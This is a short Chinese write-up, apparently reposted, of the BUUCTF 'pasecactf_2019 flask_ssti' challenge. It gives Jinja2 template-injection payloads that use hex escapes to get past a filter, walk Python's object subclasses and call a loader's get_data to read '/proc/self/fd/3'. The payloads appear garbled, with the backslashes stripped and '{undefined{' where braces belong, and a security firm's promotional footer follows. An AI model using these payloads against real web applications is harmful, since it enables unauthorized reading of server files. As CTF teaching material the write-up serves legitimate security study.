buuctf pasecactf_2019]flask_ssti-解题步骤详解

1.测试存在ssti

2.获取类型所属的对象，后面显示被过滤了，看了大佬的文章_'.这三个被过滤了，但可以用十六进制绕过

3.寻找基类

4.寻找可用引用

{undefined{()["x5fx5fclassx5fx5f"]["x5fx5fbasesx5fx5f"][0]["x5fx5fsubclassesx5fx5f"]()}}

5.接下来就是开始一系列利用了（基础不是很好，后面的待填坑）一些大佬的方法：

①

②

{undefined{()["x5Fx5Fclassx5Fx5F"]["x5Fx5Fbasesx5Fx5F"][0]["x5Fx5Fsubclassesx5Fx5F"]()[91]["getx5Fdata"](0, "/proc/self/fd/3")}}

自己的一些总结：使用[]好像可以自动补.号

以下是等价的

{{"".__class__}}{{""["x5fx5fclassx5fx5f"]}}

原文来自CSDN博主「qq_40800734」｜侵删

中电运行是专业专注培养能源企业IT工匠和提供IT整体解决方案的服务商，也是能源互联网安全专家。

为方便大家沟通，中电运行开通“中电运行交流群”，诚挚欢迎能源企业和相关人士，以及对网络安全感兴趣的群体加入本群，真诚交流，互相学习。想加入我们就给我们留言吧。

●小白必读！寰宇卫士手把手教你栈溢出（上）

●手把手教你栈溢出（中）

●手把手教你栈溢出（下）

●《信息安全知识》之法律关键常识汇总

●CTF经验分享|带你入门带你飞！

原文始发于微信公众号（寰宇卫士）：buuctf pasecactf_2019]flask_ssti-解题步骤详解